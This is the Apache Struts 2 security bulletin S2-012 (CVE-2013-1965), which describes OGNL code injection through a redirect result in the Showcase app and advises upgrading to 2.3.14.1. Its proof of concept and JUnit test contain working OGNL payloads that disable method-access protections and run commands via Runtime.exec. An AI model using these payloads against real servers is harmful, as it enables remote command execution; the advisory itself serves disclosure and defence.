<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- 
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements.  See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.  The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License.  You may obtain a copy of the License at

 http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied.  See the License for the
specific language governing permissions and limitations
under the License. 
-->
<html>
<head>
    <link type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
    <style type="text/css">
        .dp-highlighter {
            width:95% !important;
        }
    </style>
    <style type="text/css">
        .footer {
            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
            background-repeat:     repeat-x;
            background-position:   left top;
            padding-top:           4px;
            color:                 #666;
        }
    </style>
    <link href='https://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
    <link href='https://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
    <script src='https://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
    <script src='https://struts.apache.org/highlighter/js/shBrushPlain.js' type='text/javascript'></script>
    <script src='https://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
    <script src='https://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
    <script src='https://struts.apache.org/highlighter/js/shBrushJScript.js' type='text/javascript'></script>
    <script src='https://struts.apache.org/highlighter/js/shBrushGroovy.js' type='text/javascript'></script>
    <script src='https://struts.apache.org/highlighter/js/shBrushBash.js' type='text/javascript'></script>
    <script type="text/javascript">
        SyntaxHighlighter.defaults['toolbar'] = false;
        SyntaxHighlighter.all();
    </script>
    <script type="text/javascript" language="javascript">
        var hide = null;
        var show = null;
        var children = null;

        function init() {
            /* Search form initialization */
            var form = document.forms['search'];
            if (form != null) {
                form.elements['domains'].value = location.hostname;
                form.elements['sitesearch'].value = location.hostname;
            }

            /* Children initialization */
            hide = document.getElementById('hide');
            show = document.getElementById('show');
            children = document.all != null ?
                    document.all['children'] :
                    document.getElementById('children');
            if (children != null) {
                children.style.display = 'none';
                show.style.display = 'inline';
                hide.style.display = 'none';
            }
        }

        function showChildren() {
            children.style.display = 'block';
            show.style.display = 'none';
            hide.style.display = 'inline';
        }

        function hideChildren() {
            children.style.display = 'none';
            show.style.display = 'inline';
            hide.style.display = 'none';
        }
    </script>
    <title>S2-012</title>
</head>
<body onload="init()">
<table border="0" cellpadding="2" cellspacing="0" width="100%">
    <tr class="topBar">
        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-012.html">S2-012</a>
        </td>
        <td align="right" valign="middle" nowrap>
            <form name="search" action="https://www.google.com/search" method="get">
                <input type="hidden" name="ie" value="UTF-8" />
                <input type="hidden" name="oe" value="UTF-8" />
                <input type="hidden" name="domains" value="" />
                <input type="hidden" name="sitesearch" value="" />
                <input type="text" name="q" maxlength="255" value="" />
                <input type="submit" name="btnG" value="Google Search" />
            </form>
        </td>
    </tr>
</table>

<div id="PageContent">
    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-012</div>

        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818222">
                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818222">Edit Page</a>
            &nbsp;
            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
            &nbsp;
            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818222">
                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818222">Add Page</a>
            &nbsp;
            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818222">
                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818222">Add News</a>
        </div>
    </div>

    <div class="pagecontent">
        <div class="wiki-content">
            <div id="ConfluenceContent"><h2 id="S2-012-Summary">Summary</h2>

<p>
</p><p>Showcase app vulnerability allows remote command execution</p>

<div class="table-wrap"><table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Who should read this</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p>All Struts 2 developers</p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Impact of vulnerability</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p>Remote command execution</p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Maximum security rating</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p>Moderately Critical</p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Recommendation</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p>Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23141">Struts 2.3.14.1</a></p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Affected Software</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p> Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13 </p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Reporter</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p> Xgc Kxlzx, Alibaba Security Team </p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>CVE Identifier</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1965" rel="nofollow">CVE-2013-1965</a></p></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"><p>Original Description</p></th><td colspan="1" rowspan="1" class="confluenceTd"><p> Reported directly to security@a.o</p></td></tr></tbody></table></div>

<h2 id="S2-012-Problem">Problem</h2>

<p>OGNL provides, among other features, extensive expression <a shape="rect" class="external-link" href="http://commons.apache.org/ognl/language-guide.html#Expression_Evaluation">evaluation capabilities</a>. <br clear="none">
A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into a property, afterward used as request parameter of a redirect address, which will cause a further evaluation. </p>

<p>OGNL evaluation was already addressed in <a shape="rect" href="s2-003.html">S2-003</a> and <a shape="rect" href="s2-005.html">S2-005</a> and <a shape="rect" href="s2-009.html">S2-009</a>, but, since it involved just the parameter's name, it turned out that the resulting fixes based on whitelisting acceptable parameter names and denying evaluation of the expression contained in parameter names, closed the vulnerability only partially. </p>

<p>The second evaluation happens when redirect result reads it from the stack and uses the previously injected code as redirect parameter.<br clear="none">
This lets malicious users put arbitrary OGNL statements into any unsanitized String variable exposed by an action and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</p>

<h2 id="S2-012-Proofofconcept">Proof of concept</h2>

<ol><li>Run struts2-showcase</li><li>Open url: <a shape="rect" class="external-link" href="http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV" rel="nofollow">http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV</a></li><li>write skill name to %{expr} for example:
<div class="code panel pdl" style="border-width: 1px;"><div class="codeContent panelContent pdl">
<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[%{(#_memberAccess[&#39;allowStaticMethodAccess&#39;]=true)(#context[&#39;xwork.MethodAccessor.denyMethodExecution&#39;]=false) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println(&#39;hacked by kxlzx&#39;),#hackedbykxlzx.close())}
]]></script>
</div></div></li><li>submit the form</li></ol>


<p>The issue, in order to work, need a redirect result defined as the following:</p>
<div class="code panel pdl" style="border-width: 1px;"><div class="codeContent panelContent pdl">
<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
&lt;action name=&quot;save&quot; class=&quot;org.apache.struts2.showcase.action.SkillAction&quot; method=&quot;save&quot;&gt;
    &lt;result type=&quot;redirect&quot;&gt;edit.action?skillName=${currentSkill.name}&lt;/result&gt;
&lt;/action&gt;
]]></script>
</div></div>    

<h3 id="S2-012-JUnitVersion">JUnit Version</h3>
<div class="code panel pdl" style="border-width: 1px;"><div class="codeContent panelContent pdl">
<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
public void testUnsecureRedirect() {
    final String pwnDir = &quot;/tmp/PWNAGE&quot;;
    final Map&lt;String, String&gt; fakeAction = new HashMap&lt;String, String&gt;() {
        {
            put(&quot;skillName&quot;, &quot;%{(#context[&#39;xwork.MethodAccessor.denyMethodExecution&#39;]=false)(#_memberAccess[&#39;allowStaticMethodAccess&#39;]=true)(@java.lang.Runtime@getRuntime().exec(&#39;mkdir &quot; + pwnDir + &quot;&#39;))}&quot;);
        }
    };

    String location = &quot;/context/edit.action?skillName=true&quot;;
    responseMock.expectAndReturn(&quot;encodeRedirectURL&quot;, C.anyArgs(1), location);
    responseMock.expect(&quot;sendRedirect&quot;, C.args(C.eq(location)));
    requestMock.expectAndReturn(&quot;getAttribute&quot;, C.args(C.eq(&quot;javax.servlet.include.servlet_path&quot;)), location);

    ValueStack stack = ai.getStack();
    stack.push(fakeAction);

    view.setLocation(&quot;edit.action?skillName=${skillName}&quot;);
    view.setParse(true);


    try {
        view.execute(ai);

        requestMock.verify();

        File pwn = new File(pwnDir);
        boolean exists = pwn.exists();
        FileUtils.deleteDirectory(pwn);
        assertFalse(&quot;Remote exploit: The PWN folder has been created&quot;, exists);

        Object dme = stack.getContext().get(&quot;xwork.MethodAccessor.denyMethodExecution&quot;);

        assertTrue(&quot;DenyMethodExecution has been disabled&quot;, dme == null || BooleanUtils.toBoolean(dme.toString()));

    } catch (Exception e) {
        e.printStackTrace();
        fail();
    }
}
]]></script>
</div></div>
<h2 id="S2-012-Solution">Solution</h2>

<p>The OGNLUtil class was changed to deny eval expressions by default. </p>

    <div class="aui-message problem shadowed information-macro">
                            <span class="aui-icon icon-problem">Icon</span>
                <div class="message-content">
                            
<p><strong>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23141">Struts 2.3.14.1</a>, which contains the corrected OGNL and XWork library.</strong></p>
                    </div>
    </div></div>
        </div>

        
    </div>
</div>
<div class="footer">
    Generated by CXF SiteExporter
</div>
</body>
</html>
